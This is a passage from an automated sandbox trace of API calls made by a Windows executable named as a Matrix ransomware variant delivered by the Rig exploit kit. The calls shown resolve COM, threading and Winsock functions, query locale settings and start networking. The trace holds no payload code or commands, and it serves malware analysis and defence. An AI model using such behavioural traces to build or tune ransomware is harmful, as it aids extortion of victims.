LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0090.875] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0090.876] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0090.876] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0090.876] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0090.876] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0090.876] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0090.876] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0090.876] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0090.876] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0090.876] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0090.876] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0090.876] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=14766522963) returned 1 [0090.876] GetTickCount () returned 0x225e7 [0090.876] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x7, wMilliseconds=0xe2)) [0090.876] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x7, wMilliseconds=0xe2)) [0090.876] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=14766537886) returned 1 [0090.876] GetTickCount () returned 0x225e7 [0090.876] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x7, wMilliseconds=0xe2)) [0090.876] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x7, wMilliseconds=0xe2)) [0090.876] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0090.876] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0090.876] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x13f82bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0090.876] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0090.876] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0090.876] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x13e288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0090.876] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0090.876] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0090.877] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x13f82bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0090.877] GetProcAddress (hModule=0x76750000, lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x13f82bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0090.877] GetProcAddress (hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0090.877] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0090.877] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x13ff48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0090.877] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0090.877] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x13ff48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0090.877] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x13ff48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0090.877] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0090.877] GetThreadLocale () returned 0x409 [0090.877] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0090.877] GetCurrentThreadId () returned 0xa8c [0090.877] GetCurrentThreadId () returned 0xa8c [0090.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0090.877] GetThreadLocale () returned 0x409 [0090.878] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0090.878] GetThreadLocale () returned 0x409 [0090.878] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0090.878] GetCurrentThreadId () returned 0xa8c [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thursday") returned 9 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 8 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="June") returned 5 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0090.879] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0090.879] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0090.879] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0090.879] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0090.879] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0090.879] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0090.879] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0090.879] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0090.879] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0090.879] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0091.634] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0091.634] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0091.634] GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0091.634] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="getpeername") returned 0x77387147 [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 0x77386b0e [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="getservbyname") returned 0x77396ef3 [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0091.636] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0092.065] GetACP () returned 0x4e4 [0092.065] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0092.065] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe" (normalized: "c:\\users\\eebsym5\\desktop\\2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe")) returned 0x57 [0092.065] GetTickCount () returned 0x22635 [0092.065] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=14885424557) returned 1 [0092.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x37\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6c\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x36\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4f\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x57\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x44\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x49\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x39\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x46\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6d\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.066] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x72\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.066] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x73\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.066] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6f\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.066] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x79\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.066] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x31\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.066] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: 